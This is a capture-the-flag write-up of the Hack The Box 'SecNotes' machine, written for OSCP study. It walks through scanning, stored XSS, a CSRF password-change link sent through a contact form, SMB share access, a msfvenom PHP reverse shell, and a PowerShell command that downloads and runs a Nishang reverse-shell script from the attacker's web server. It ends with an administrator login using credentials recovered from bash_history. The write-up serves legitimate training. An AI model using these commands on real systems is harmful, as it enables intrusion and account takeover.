Joshua Surendran

Nov 7, 2020

9 min read

Hack The Box: SecNotes Write-up (#28)

This is my 28th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomater 10.10.10.97 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

---------------------Starting Nmap Quick Scan---------------------| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m31s, median: 0s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2020-10-14T03:13:52-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-14T10:13:53
|_ start_date: N/A
---------------------Starting Nmap Basic Scan---------------------Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 04:59 +08
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m18s, deviation: 4h37m09s, median: 16s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2020-11-06T13:00:09-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-06T21:00:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.63 seconds
----------------------Starting Nmap UDP Scan----------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 05:00 +08
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up.
All 1000 scanned ports on secnotes.htb (10.10.10.97) are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.50 seconds---------------------Starting Nmap Full Scan----------------------Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 05:03 +08
Initiating SYN Stealth Scan at 05:03
Scanning secnotes.htb (10.10.10.97) [65535 ports]
Discovered open port 80/tcp on 10.10.10.97
Discovered open port 445/tcp on 10.10.10.97
SYN Stealth Scan Timing: About 11.65% done; ETC: 05:08 (0:03:55 remaining)
SYN Stealth Scan Timing: About 23.08% done; ETC: 05:08 (0:03:23 remaining)
SYN Stealth Scan Timing: About 34.51% done; ETC: 05:08 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.93% done; ETC: 05:08 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.36% done; ETC: 05:08 (0:01:52 remaining)
SYN Stealth Scan Timing: About 68.65% done; ETC: 05:08 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.21% done; ETC: 05:08 (0:00:52 remaining)
Discovered open port 8808/tcp on 10.10.10.97
Completed SYN Stealth Scan at 05:08, 262.70s elapsed (65535 total ports)
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.10s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
8808/tcp open ssports-bcast
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.80 seconds

We have 3 ports open.

  • Port 80: — running HTTP, Microsoft IIS httpd 10.0
  • Port 445: — running Samba
  • Port 8808: — running HTTP, Microsoft IIS httpd 10.0

Before we begin, let’s make quick mental notes.

  • Port 80, likely to be our initial foothold. We enumerate the pages and find any possible hidden directories that have sensitive information or any admin login page.
  • Samba share normally linked to webroot directory for cases like where more than one HTTP service running. Since we have an additional HTTP service running on port 8808, possible this could be used for file upload and LFI.

Service Enumeration

Visit the page.

We have a login page. I tried with common and weak credentials but none of them works. I tried for SQL injection also but it is not vulnerable. The only option we have is to sign up for an account.

While I signing up a new account, password length information is leaked which is a minimum of 6 character length required. I have created an account with credentials admin/admin1. Let’s login.

We are successfully login as an admin user. Here we an internal user Tyler and the domain secnotes.htb information. Take note of that. Additionally, we have 4 functionalities here. Let’s test for 3 of them.

  1. New Note

Let’s test for cross-site scripting (XSS) vulnerability.

Set a netcat listener on your Kali Linux on port 80 and click save on the above page.

We have a response with a session cookie. This is stored XSS because when I refreshed the page it kept sending a request to my netcat listener. So here the Note field is vulnerable to stored XSS. But is it not useful in this case unless a user with admin privilege login so that we can steal his/her cookie to authenticate into this page.

2. Change Password

Let’s change the password to admin2 and observe the request and message body in Burp.

On successful change of password, it redirects us to home.php page.

3. Contact Us

Here we can send a message to Tyler. Let’s call our web server in the message field and observe it in netcat listener on our Kali Linux.

We have incoming request and Message Sent notification.

What does this tell us? If we send a link via this message field, it will be executed by Tyler. Great! Let’s turn this into an initial foothold.

We copy the request from Change Password functionality and send it to Tyler via the Contact Us form as a GET request.

http://10.10.10.97/change_pass.php?password=admin1&confirm_password=admin1&submit=submit

Once done, we should see the Message Sent notification as we did earlier in this write-up.

Let’s login with Tyler / admin1 credentials.

We are in! After checked each note, under new site we have Samba share credentials for the user Tyler.

Let’s list the share with tyler/92g!mA8BGjOirkL%OG*& credential.

Let’s check permission on new-site share.

We have full permission! Now we mount this share locally on our Kali Linux and check the contents.

Create a new directory in the current working directory and mount the share on it with the following command.

root@kali:/htb/SecNotes# mkdir share
root@kali:/htb/SecNotes# mount -t cifs -o user=tyler,domain=secnotes.htb //10.10.10.97/new-site share/

When prompt for password enter Tyler’s password. Verify the share has mounted successfully with df command.

Now, access to the mount point share/ and list the contents.

root@kali:/htb/SecNotes/share# ls -ltr
total 104
-rwxr-xr-x 1 root root 98757 Jun 21 2018 iisstart.png
-rwxr-xr-x 1 root root 696 Jun 21 2018 iisstart.htm

These are the image files for the new site running on port 8808.

Exploitation

Now generate a msfvenom reverse shell payload in the current directory. We know the webserver supports PHP language and we generate using PHP payload.

msfvenom -p php/reverse_php lhost=10.10.10.50 port=4444 -o reverse.php

Set a netcat listener on your Kali Linux

nc -nlvp 4444

Call this reverse.php payload from the browser.

http://10.10.10.97:8808/reverse.php

We got a reverse shell! But this shell is not stable. We need another stable shell. For this let us Nishang script for a new shell.

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.50 -Port 4445

When called, this sends a reverse shell back to our Kali Linux on port 4445.

Set up a Netcat listener on Kali Linux.

nc -nlvp 4445

Set a web server within the directory where shell.ps1 is placed.

python3 -m http.server 80

Run below command from your first reverse shell.

powershell "IEX(New Object Net.WebClient).downloadString('http://10.10.14.50/shell.ps1')"

Go back to your listener and see if we get a shell.

We have a shell again! We are in the context of user Tyler. Let’s grab the user.txt flag.

Download winPEAS privilege escalation script from here and transfer to the target machine.

Run the script.

./winPEAS.exe

After reviewing the output, the password files info section attract my attention.

A quick Google search for “…\canonicalgrouplimited.ubuntu18.04onwindows_79rhkp1fndgsc\localstate\rootfs” shows that it is a Linux distribution package that can be installed alongside Windows. This is the path where the distribution packages installed. After spending sometime enumerating the path “…\canonicalgrouplimited.ubuntu18.04onwindows_79rhkp1fndgsc\localstate\rootfs/root/”, I got a .bash_history file.

Normally bash_history files contain commands and sensitive information like credentials. Let’s check that file.

We can see administrator credentials were used to access samba share. Let’s use them to escalate privilege with the pass-the-hash method.

From Kali Linux, run below command.

pth-winexe -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

We are an Administrator! Grab the root.txt flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Legacy.